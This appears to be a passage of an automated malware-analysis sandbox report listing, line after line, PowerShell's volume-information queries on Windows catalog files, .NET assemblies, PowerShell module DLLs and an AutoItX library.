Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
